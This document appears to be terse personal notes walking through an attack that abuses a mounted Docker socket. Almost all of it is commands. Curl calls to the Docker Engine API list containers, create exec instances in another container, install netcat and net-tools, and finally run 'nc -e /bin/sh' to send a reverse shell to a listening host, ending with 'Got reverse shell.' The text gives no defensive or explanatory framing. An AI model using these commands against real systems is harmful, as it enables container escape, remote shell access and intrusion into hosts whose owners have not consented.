

Running docker container with docker.sock mounted:

sudo docker run -it -d -p 22:22 -v /var/run/docker.sock:/var/run/docker.sock ubuntu:new

List running docker containers with docker.sock and curl

curl -s --unix-socket /var/run/docker.sock -X GET http://localhost/containers/json | jq

List docker images with docker.sock and curl

curl -s --unix-socket /var/run/docker.sock -X GET http://localhost/images/json | jq




==Create Exec instance from running container:

curl --unix-socket /var/run/docker.sock -X POST http://localhost/v1.41/containers/43de4ed6fa5df1e1f06432df00f6070fb8b6213992b84a7ae2646130263cbd4b/exec -H "Content-Type: application/json" -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "DetachKeys": "ctrl-p,ctrl-q", "Tty": false, "Cmd": ["date"] }'


==Copy the instance id:



==Run the exec instance:

curl --unix-socket /var/run/docker.sock -X POST http://localhost/v1.41/exec/46256aeee7dd58d3294d8a93679a80656e0a94e0a2b562e6c4d90679affd7e92/start -H "Content-Type: application/json" -d '{ "Detach": false, "Tty": false }'


------

==Installing netcat:

curl --unix-socket /var/run/docker.sock -X POST http://localhost/v1.41/containers/43de4ed6fa5df1e1f06432df00f6070fb8b6213992b84a7ae2646130263cbd4b/exec -H "Content-Type: application/json" -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "DetachKeys": "ctrl-p,ctrl-q", "Tty": false, "Cmd": ["apt","install","-y","netcat"] }'

f24da60ac564085c4a331e65a57fb09a5c7fff8fde0bae2962780f263b57e7a3

curl --unix-socket /var/run/docker.sock -X POST http://localhost/v1.41/exec/f529f39d3b0386af404cf6735110fe0ebfd76a0a6dde57aa09b372c594d6b325/start -H "Content-Type: application/json" -d '{ "Detach": false, "Tty": false }'

==Check nc

curl --unix-socket /var/run/docker.sock -X POST http://localhost/v1.41/containers/43de4ed6fa5df1e1f06432df00f6070fb8b6213992b84a7ae2646130263cbd4b/exec -H "Content-Type: application/json" -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "DetachKeys": "ctrl-p,ctrl-q", "Tty": false, "Cmd": ["which","nc"] }'

14b6a08a29fca55a35166f67b48e67cb56387722a67794b397936acc37a31c7a

curl --unix-socket /var/run/docker.sock -X POST http://localhost/v1.41/exec/187d793157aba0a01c1fac853a948d7cf11ff4aa13647236265b26707229f2fb/start -H "Content-Type: application/json" -d '{ "Detach": false, "Tty": false }'


==Install nettools

curl --unix-socket /var/run/docker.sock -X POST http://localhost/v1.41/containers/43de4ed6fa5df1e1f06432df00f6070fb8b6213992b84a7ae2646130263cbd4b/exec -H "Content-Type: application/json" -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "DetachKeys": "ctrl-p,ctrl-q", "Tty": false, "Cmd": ["apt","install","-y","net-tools"] }'



curl --unix-socket /var/run/docker.sock -X POST http://localhost/v1.41/exec/55cd4e8cd11c8d1816a05f1bb9c5f488e1ef1f399a0a1ab226d12b86dd03c604/start -H "Content-Type: application/json" -d '{ "Detach": false, "Tty": false }'

==Check IP address


curl --unix-socket /var/run/docker.sock -X POST http://localhost/v1.41/containers/43de4ed6fa5df1e1f06432df00f6070fb8b6213992b84a7ae2646130263cbd4b/exec -H "Content-Type: application/json" -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "DetachKeys": "ctrl-p,ctrl-q", "Tty": false, "Cmd": ["ifconfig"] }'


curl --unix-socket /var/run/docker.sock -X POST http://localhost/v1.41/exec/63272fa7c7d7a490c81b5f82c103a97ff0f70db9bbe208a7253b629ff649fb34/start -H "Content-Type: application/json" -d '{ "Detach": false, "Tty": false }'


===


Open nc reverse shell:


nc -lvp 8080


Send reverse shell:


nc -e /bin/sh 172.17.0.3 8080

curl --unix-socket /var/run/docker.sock -X POST http://localhost/v1.41/containers/43de4ed6fa5df1e1f06432df00f6070fb8b6213992b84a7ae2646130263cbd4b/exec -H "Content-Type: application/json" -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "DetachKeys": "ctrl-p,ctrl-q", "Tty": false, "Cmd": ["nc","-e","/bin/sh","172.17.0.3", "8080"] }'



curl --unix-socket /var/run/docker.sock -X POST http://localhost/v1.41/exec/d935735b99544f6c89d8624db724ee943389f674c2b556fb59c5865236b15b72/start -H "Content-Type: application/json" -d '{ "Detach": false, "Tty": false }'



Got reverse shell.
===




